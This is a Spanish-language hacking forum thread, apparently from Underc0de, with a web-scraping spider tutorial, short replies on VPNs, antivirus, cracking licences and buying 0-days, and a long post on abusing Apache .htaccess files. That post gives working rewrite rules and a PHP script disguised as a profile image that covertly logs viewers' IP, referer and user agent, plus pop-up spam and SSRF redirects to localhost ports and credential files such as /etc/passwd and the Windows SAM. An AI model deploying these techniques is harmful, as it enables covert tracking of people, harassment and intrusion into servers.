Con nuestra librería de requests podremos ver el contenido fuente de cualquier página y realizar peticiones por métodos como GET y POST. El método de requests.get nos devuelve también un código de status.

import requests 
page_get = requests.get("https://viinacademy.com/index.html")

<Response [200]>

El código de status nos indica si la página respondió correctamente, en otros casos puede dar otro tipo de códigos de estado, como por ejemplo 500, que corresponde a un Internal Server Error.

Podemos imprimir el contenido de la página usando webpage.content:

import requests 
page_get = requests.get("http://example.com/index.html")
page.content

Donde devolverá todo el contenido del HTML:

b'<!DOCTYPE html>\n<html>\n    <head>\n        <title>A simple example page</title>\n    </head>\n    <body>\n        <p>Here is some simple content for this page.</p>\n    </body>\n</html>'

Entremos con BS4

BS4 nos permite la extracción de datos en concreto de una página web. Podemos usarla para archivos .html o para .xml. Nosotros podemos parsear el documento y extraer todos las etiquetas de párrafos que existen. Para ello, podemos usar el siguiente código:

from bs4 import BeautifulSoup
page = requests.get("http://example.com")
soup = BeautifulSoup(page.content, 'html.parser')
soup.find_all('p')

BeautifulSoup nos permite extraer etiquetas como a href, párrafos, incluso selectores de CSS. Si quieres ver muchos de los ejemplos que existen actualmente de esta grandiosa librería, puedes irte a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Concluyendo, hay muchas más librerías un poco más potentes que bs4, sin embargo, ésta bien usada también tiene un gran potencial para realizar scraping y/o recolección de información.

A continuación el spider que realicé y que pueden comprender mediante los distintos comentarios que dejé en el código.

# Importamos librerías. #
import requests
import sys

from bs4 import BeautifulSoup

# Creamos nuestras listas. #
urls = []
urls2 = []

# Recibimos los argumentos. #
target_url = sys.argv[1] 

# Realizamos una conexión al argumento pasado y además, leemos todo el contenido del código fuente que existe en la página. #
url = requests.get(target_url).content
# Usamos nuestra librería de bs4 para posteriormente recatar lo que deseamos. #
soup = BeautifulSoup(url)
# Mediante el for y el método de bs4 llamado find_all, recolectamos todas las etiquetas donde existe a href. #
for line in soup.find_all('a'):
    new_line = line.get('href')
    try: 
    	# Si existe en alguna línea del código fuente el http, lo almacenamos en nuestra lista llamada urls. #
        if new_line[:4] == "http": 
            if target_url in new_line: 
            	urls.append(str(new_line)) 
        # Si no existe, intentamos combinar nuestro argumento(url de la página) + lo que encontramos. #
        elif new_line[:1] == "/": 
            try:
                comb_line = target_url+new_line 
                urls.append(str(comb_line))  
            except: 
                pass
        # Recorremos lo que hemos guardado anteriormente en nuestra lista(urls).
        for get_this in urls: 
        	# Como dentro de urls están todos los enlaces, realizamos una conexión a dicha url y leemos el código fuente. #
            url = requests.get(get_this).content 
            # Usamos nuestra librería de bs4 para posteriormente recatar lo que deseamos. #
            soup = BeautifulSoup(url) 
            for line in soup.find_all('a'): 
                new_line = line.get('href') 
                try: 
                    if new_line[:4] == "http": 
                        if target_url in new_line:
                            urls2.append(str(newline)) 
                    elif new_line[:1] == "/": 
                        comb_line = target_url+new_line 
                        urls2.append(str(comb_line)) 
                except: 
                    urls_3 = set(urls2)
            # Recorremos nuestra lista llamada urls_3 e imprimimos todos los links de nuestro spider.
            for value in urls_3: 
                print(value)
    except:
    	pass

# Mortal_Poison -> https://www.youtube.com/VIINVIDEOSHD.

Espero que les sirva, para ejecutarlo, basta con poner en nuestro cmd o nuestra terminal: python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Les dejo una captura de cómo funciona:



Cualquier pregunta/duda/sugerencia será bien recibida.

En un próximo post traeré de cómo recatar información cuando están en tablas o bueno, de cómo podemos combinarlo con librerías de DataFrame para hacer mucho más potente nuestra recolección de datos.

Un ejemplo más práctico lo pueden ver en el siguiente vídeo:


Un saludo.

Hola a tod@s,

Realmente casi la mayoría de servicios de VPN husmean y guardan logs de las personas que lo usan. Hay unas cuantas que se salvan, sin embargo, no son muy populares. Hay que tener en cuenta que si quieres un poco más de privacidad puedes usar una cadena de proxies combinado con una VPN(preferiblemente que no guarde LOGS).

De hecho, cada año veo que salen noticias de servicios de VPN(que se jactan de no guardar logs) que han suministrado datos a las autoridades.

Un saludo.

Hola Kelo_07,

No te preocupes, un saludo  .

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Estoy de acuerdo contigo al poner que cuando se incluyen scripts en el html5 se considere Scripting. Pero no creo que sea script un simple documento como este:

<!DOCTYPE html>
 <html lang="es">   
  <head>      
   <meta charset="utf-8">     
    <title>This is HTML only...</title>    
 </head>     
<body>        
 <h1>This is HTML only...</h1>  
       <p>             Lorem Ipsum        </p>    
 </body>
</html> 

Ahí no hay nada de scripting, ya si le incluimos la etiqueta de script para invocar alguno, es otra cosa. Es como decir que PHP es HTML, porque en PHP puedes incluir etiquetas de HTML y a su vez, será un fichero .php.

Un saludo.

Hola Kelo_07,

Aparte de lo que te ha mencionado @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login quería mencionarte que no debes confundir scripting con html. Sin ánimo de cualquier cosa negativa, recuerda que html es un lenguaje de marcas de hipertexto(HyperText Markup Language, por sus siglas en inglés), por ende, son etiquetas. Si pones script, estaríamos hablando por ejemplo de: PHP, JavaScript, Python, Perl, Ruby, entre otros.

Un saludo.

Hola dr3x,

¿Antivirus gratuitos o no?
Los antivirus gratuitos tienen características muy bajas, se mantienen con la publicidad y bueno, creo que lo mejor sería optar por uno de pago(están más a la vanguardia de lo que sucede en el mundo para poner las firmas).

¿Merece la pena comprar una licencia?
Para mí, sí que lo vale. No por el hecho de que los antivirus puedan ser una misma vulnerabilidad, sino por el hecho de que para personas o usuarios con un poco de desconocimiento, deben estar actualizados. Al licenciar un antivirus, no solo compras la caducidad, sino también las actualizaciones casi que diarias.

¿Es contraproducente crackear una licencia?
Si la crackeas tú mismo y logras hacer que el antivirus se actualice constantemente, estupendo. Pero si la crackeas y la versión del antivirus se queda sin poderse actualizar, no lo recomendaría.

¿Qué es lo más asequible?
Ahí si es complicado de responder, porque depende del presupuesto y de para qué se use(porque hasta en empresas los licencian).

¿Cuánto hay de cierto o de incierto en los vendedores de este tipo se software?
Muchísimas cosas, desde que ellos mismos fabrican malware y les sacan la 'solución'. Entonces suelen vender humo. No sé si te has enterado lo de Kaspersky, que estaba ayudando al gobierno Ruso a obtener datos del gobierno de EE.UU por medio de su antivirus. Desconozco si lo mismo habrán hecho con los usuarios.

¿Qué usas tú? ¿Qué me puedes recomendar?
Controlar más lo que sale que lo que entra a tu computador, sobretodo, sé consciente que cualquier archivo, puede estar manipulado para infectarte. Siempre andar con precaución es lo mejor. Tienes a disposición virustotal por ejemplo, que si deseas escanear archivos, documentos o incluso URLs lo puedes hacer. OJO, no lo hagas con los malwares que crees, porque sino te lo firman y eso duele  .

Un saludo.

Posdata: de las opciones que diste a elegir, me quedaría con MalwareBytes.

Hola a tod@s,

Éste es mi segundo post, ya que el que les iba a traer aún no lo termino  . Sin embargo, me propuse a postear algo interesante y creo que esto le servirá a muchas personas que quieren documentar/reportar/aprender sobre las explotaciones y post-explotaciones a los archivos .htaccess.

DEFINICIONES...

htaccess hace referencia a Hypertext Access. Es un archivo de configuración usado por servidores Apache. En éste archivo lo que se determinan son las reglas de cómo queremos que se comporte el servidor, indicándole los ajustes iniciales. Es usado muy común cuando deseamos proteger algún directorio en especial o incluso, no sé si han notado que muchos administradores de Joomla!, Wordpress, Drupal u otro CMS(Content Management System) los usan para que no accedan a sus paneles de administración.

---

POP-UPS CONTINUOS A LOS USUARIOS

A continuación les muestro un ejemplo de un archivo .htaccess:

### MAIN DEFAULTS ###
Options +ExecCGI -Indexes
DirectoryIndex index.html index.htm index.php
DefaultLanguage en-US
AddDefaultCharset UTF-8
ServerSignature Off

Ejemplo tomado de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Me parece muy interesante dicho ejemplo, pues noten que tiene una regla llamada ServerSignature en modo Off, ésto, con el fin de ocultar y no permitir el banner grabbing de Apache. Si no sabes qué es el banner del servidor web de Apache, es cuando en fase de reconocimiento te das cuenta de que la aplicación web que estás auditando está alojada en Apache por sus cabeceras, devolviendote algo similar a:


La técnica de los pop-ups realmente no es un peligro, sin embargo, es usado por muchos 'troles' que desean molestar los foros/sitios web y demás entornos donde se pueda subir una foto de perfil, avatar personalizado y también las famosas firmas.

En ésta técnica abusamos del mod_rewrite, cuyo fin es para designar y modificar el cómo se muestran las URL y las páginas web de tus sitios a tus usuarios. Palabras más, palabras menos, con él, podemos redireccionar. Un ejemplo  claro sería cuando tenemos:

URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. El mod_rewrite se encargaría de convertir esa url a:
URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Para un ejemplo más sustancioso, haz de cuenta que tienes dos imágenes: publica.png y protegido.png. publica.png se almacenará en un directorio público, mientras que protegido.png se almacenará en un directorio protegido con su respectiva contraseña(por algo es protegido).

Teniendo en cuenta esto, nuestro archivo .htaccess quedaría de la siguiente manera:

Options +FollowSymlinks
RewriteEngine on
RewriteRule publica.png /protected-directory/protegido.png
AuthUserFile /home/usr/.htpasswd
AuthName "authentication name"
AuthType Basic
require user mortal

Explicando a groso modo, las anteriores reglas:

• FollowSymlinks : cuando se trata de servidores web, no puedes dejar las cosas sin definir. Tienes que definir quién tiene acceso a qué. La regla de FollowSymlinks le dice a su servidor si debe o no seguir los enlaces simbólicos.
• RewriteEngine : nos permite reescribir o redireccionar una URL.
• Auth*(el asterisco indica todo lo que siga después de Auth) : apunta al archivo de contraseñas que creamos, en éste caso, el archivo se llama .htpasswd.
• require user : Requiere a un usuario válido.

¿Notaron que estamos haciendo una redirección de publica.png a protegido.png, no? sino, ya casi lo norarán.
Como lo mencione, el archivo donde almacenamos las contraseñas(llamado .htpasswd) deberá estar configurado de la siguiente manera:
username:contraseñaEncriptada


El nombre de usuario claramente tendrá que coincidir con el nombre de usuario que agregó en el archivo .htaccess. La contraseña encriptada se puede realizar mediante la función de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login sino, puedes usar generadores de contraseñas en línea.

Ahora, lo que podrías hacer es configurar como imagen de perfil/imagen de un foro o cualquier otro, la imagen publica.png. ¿Qué sucederá? cualquier persona que desee ver tu imagen le aparecerá repetidamente el aviso para incorporar el nombre de usuario y contraseña. Es un poco molesto la verdad, y ya se consideraría spam.

---

FINGERPRINTING - IP  LOGGING

Similar a la técnica número uno, ésta técnica nos ofrece poder rastrear direcciones IP sin la interacción de los usuarios. Incluso, podríamos establecer que se descargue un fichero autoejecutable con evasiones de antivirus para que tengamos una conexión meterpreter (si el autorun no está habilitado[cosa que normalmente pasa ] podemos usar el USB Rubber Ducky o el más querido, BADUSB).

El hecho es que, dejando de lado lo del payload autoejecutable, la técnica realmente consiste en recopilar todo tipo de información sin que ellos sean conscientes.

Haríamos básicamente la misma redirección, solo que a nuestro fichero de .php:

Options +FollowSymlinks
RewriteEngine on
RewriteRule publica.png /path/to/mortal.php

Quizá, te estarás preguntando, ¿y el servidor 'víctima' cómo interpretará el archivo de mortal.php si pública.png lo redirecciona?. Entendámolo mejor.

Debemos engañar al servidor para que considere que hemos incluido una imagen válida. Desde el punto de vista de los servidores, ellos estarán haciendo una solicitud a un archivo de imagen. Generalmente los servidores no incluyen la imagen en la página(y mucho menos nuestro script de PHP). Como somos magos, debemos engañar al servidor para que considere que estamos incluyendo una imagen y no nuestro script de mortal.php.

Para engañarlo, basta con que hagamos uso de la gran función de php llamada imagecreate(). Así es, vamos a usar imágenes dinámicas de PHP para que el servidor crea que estamos incluyendo publica.png en lugar de mortal.php.

He implementado un pequeño script en PHP:

<?php
/* Vamos a escribir en un archivo de html. */
$log = 'data.html';
/* Capturamos la ip de nuestra víctima. */
$remote_ip = $_SERVER['REMOTE_ADDR'];
/* Capturamos la URI actual de la página. */
$page_URI = $_SERVER['REQUEST_URI'];
/* Capturamos el referer, es decir, de dónde viene. */
$refer_where = $_SERVER['HTTP_REFERER'];
/* Día, mes, año y hora. Esto, por si deseamos tener más segmentado nuestra información */
$date_time = date('l, F d y h:i:s'); 
/* El navegador que está usando */
$agent_get = $_SERVER['HTTP_USER_AGENT'];


/* Abrimos nuestro archivo de data.html y comenzamos a insertar los datos */
$fp = fopen("data.html", "a");
	/* Se inserta la fecha, IP, la página, el referido y el user_agent. */
	fputs($fp, "<b>$date_time</b><br> 
	            <b>IP: </b>$remote_ip<br>
				<b>Page_URI: </b>$page_URI<br>
				<b>Refer: </b>$refer_where<br>
				<b>Useragent:</b>$agent_get <br>
				####################################### <br><br>");
	flock($fp, 3); /* Usamos bloqueo obligado a todo lo que contiene nuestra variable fp. */
	/* Cerramos nuestro archivo */
	fclose($fp);

/* Hacemos la magia */

/* imagecreate nos permite representar una imagen en blanco del tamaño especificado. imagecreate(ancho*alto). */
$my_img_ = imagecreate(190 ,100);
/* Rellenamos el color de fondo. */
$background = imagecolorallocate( $my_img_, 121, 0, 255);
$text_colour = imagecolorallocate( $my_img_, 200, 200, 0 );
$line_colour = imagecolorallocate( $my_img_, 212, 233, 0 );

/* Dibujamos una cadena horizontalmente. */
imagestring( $my_img_, 4, 30, 25, "For our victim...", $text_colour );
/* Grosor de nuestra linea. */
imagesetthickness ( $my_img_, 3);
/* Color de nuestra línea */
imageline( $my_img_, 30, 45, 165, 45, $line_colour );
/* Lo admitido. */
header( "Content-type: image/png" );
/* Mostramos nuestra imagen. */
imagepng( $my_img_ );
/* Y procedemos a mostrar lo demás. */
imagecolordeallocate( $line_color );
imagecolordeallocate( $text_color );
imagecolordeallocate( $background );
/* No es necesario, pero vamos, es una buena práctica por si llegase a ser muy grande la imagen. */
imagedestroy($my_img_);


/* https://www.youtube.com/VIINVIDEOSHD */
/* https://www.viinacademy.com */
/* https://underc0de.org/foro/profile/mortal_poison */
?>

Pueden testear como se ve la imagen que creamos en la siguiente URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si notan, en el código existe una vulnerabilidad xD, simplemente quería hacer un poco de consciencia. La vulnerabilidad es un XSS persistente y se encuentra en el $_SERVER['HTTP_USER_AGENT']; y bueno, la verdad es que para mitigar esto, cambien el data.html a data.txt.


Si no entienden algo del código, lo dejé comentado. En resumen, lo que hace el script es: cuando se presenta la imagen en el navegador de los usuarios, éste escribirá su agente de usuario, dirección IP, el encabezado de referencia y otra información útil. Imaginen cuánto daño se podría causar, desde saber de dónde se conectan las víctimas hasta diseñar payloads para los mismos.

Para finalizar, si llegases a establecer tu imagen de perfil publica.png, la secuencia de .htaccess redirigiría a la secuencia de comandos PHP ocasionando que el servidor piense que publica.png es mortal.php y nos suministre lo que deseamos .

---

Evasión de vulnerabilidades web

htaccess tiene varios usos para la evasión de filtros con respecto a las vulnerabilidades web. Comencemos con un vector de ataque de falsificación de solicitudes de servidor(SSRF).

Server-Side Request Forgery

He diseñado un diagrama que les dará a entender cómo funciona éste ataque(para los que no lo conocen):


Si aún no logras entender el diagrama, te explicaré de una forma más sustanciosa. Para propósitos de ejemplo, supongamos que tienes la web:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El parámetro ?url= está por método GET de HTTP, por tanto, podrías cambiar a:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Recuerda que el puerto 3306 hace referencia(usualmente) a la base de datos. Asumiendo eso, ésto permitiría a un atacante la divulgación de archivos locales a través de SSRF, permitiendo leer contenido localmente. Hay muchas protecciones contra éste tipo de ataques, pero también muchas formas de hacer Bypass.

Por supuesto, podríamos lograr incluso RCE asumiendo que existen servicios como smb, sftp, gopher, memcached, entre otros.
Nuestro htaccess quedaría de la siguiente manera:

Options +FollowSymlinks
RewriteEngine on
RewriteRule publica.png http://127.0.0.1:3306

Redireccionamos de publica.png a la base de datos del localhost con el fin de que no se nos incluya en una blacklist si llegase a existir una protección directa. A pesar de que lo redireccioné al localhost, pueden hacerlo con otros archivos importantes, como por ejemplo: /etc/passwd,C:\WINDOWS\system32\config\SAM o C:\WINDOWS\system32\config\SYSTEM.

Tendríamos que hacer la llamada a nuestra imagen desde el sitio para que nos devuelva información que hemos solicitado mediante nuestro ataque de SSRF.


Tenemos que considerar el alcance que podría repercutir tener un fichero .htaccess a disposición de un atacante. Hagamos un poco de GHDB básico.


Si observan detalladamente, NO en todas las webs aparece como: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Aparecen como:

• 1.htaccess
• a.htaccess
• _1.htaccess
• Old.htaccess
• _____.htaccess

el .htaccess varía a menudo, quizá alguno que posea un poco más de tiempo, podría crear un script que con un diccionario de ese tipo de opciones(como la anterior lista) encuentre el .htaccess de una web.

Para terminar, desearía concluir que tener conocimiento de las reglas de .htaccess en cualquier web, permitirá a un atacante saber qué restricciones de seguridad existen y cuáles no. Por lo tanto, permitirá saber qué es lo que potencialmente necesita ser evitado y aprovecharse de ello. También puede revelar información sobre las tecnologías que se ejecutan en la website(importante).

Incluyendo que si por 'x' motivo un atacante tiene acceso limitado a un servidor, es decir, tiene permisos pero no puede editar archivos ni realizar otras acciones, pero tiene la capacidad de editar el .htaccess repercutirá en un grave problema de seguridad(tan así, que hasta se puede subir una webshell).

En otro post podría poner de cómo tener más alcance con esto.

Espero que les haya gustado el post.
Cualquier duda/sugerencia/aporte pueden escribirlo por este medio.

Muchas gracias por leer.

Un saludo.

Me pueden encontrar en:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


GLOSARIO:

Banner grabbing: obtener información sobre el servidor donde reside la aplicación web, llegando al punto de relacionarse con Fingerprinting.
RCE: Ejecución de código remoto. Es una vulnerabilidad para ejecutar cualquier comando en una máquina de destino o en un proceso de destino.
Bypass: Saltarse una medida de protección.
GHDB: Google Hacking Database.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, hemos publicado el artículo en el Blog de Underc0de, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Gracias por permitirnos compartirlo.

Un saludo .!

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

¡Qué genialidad! muchísimas gracias, estoy en construcción de otras guías y espero que también le guste a la comunidad.

Un saludo.

Hola الدفتيريا,

La verdad eso varía mucho, hay webs que te certifican y te hacen una prueba antes de comprarlo. Sin embargo, 0-day es una de las más 'confiables' que hay en el mercado. En la Deep Web me he encontrado en cantidad, pero también he visto que muchas son estafas. Ya será cuestión de cada quién comprar y arriesgar el dinero(ya que de por sí, son caros).


Un saludo.

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Realmente las conexión no vienen limitadas por el speed download/upload que te proveen sino más bien de tu router(el cuántas soporta).
Me gustaría que publicases qué marca es y de ahí poder dar una respuesta más precisa.

Muchos routers e incluso AP's permiten limitar el número que admiten de clientes wifi en simultáneo.

Un saludo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy buen aporte compañero
Bien detallado y explicado 
Gracias!

Hola Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Muchas gracias, realmente agradezco el apoyo de la comunidad. Tengo en mente más post de mayor calidad.

Un saludo  .

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Bro una pregunta esto también se puede hacer para una aplicación para android?

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Claro que sí, por eso mismo puse que para móviles sería con Selendroid.

Un saludo.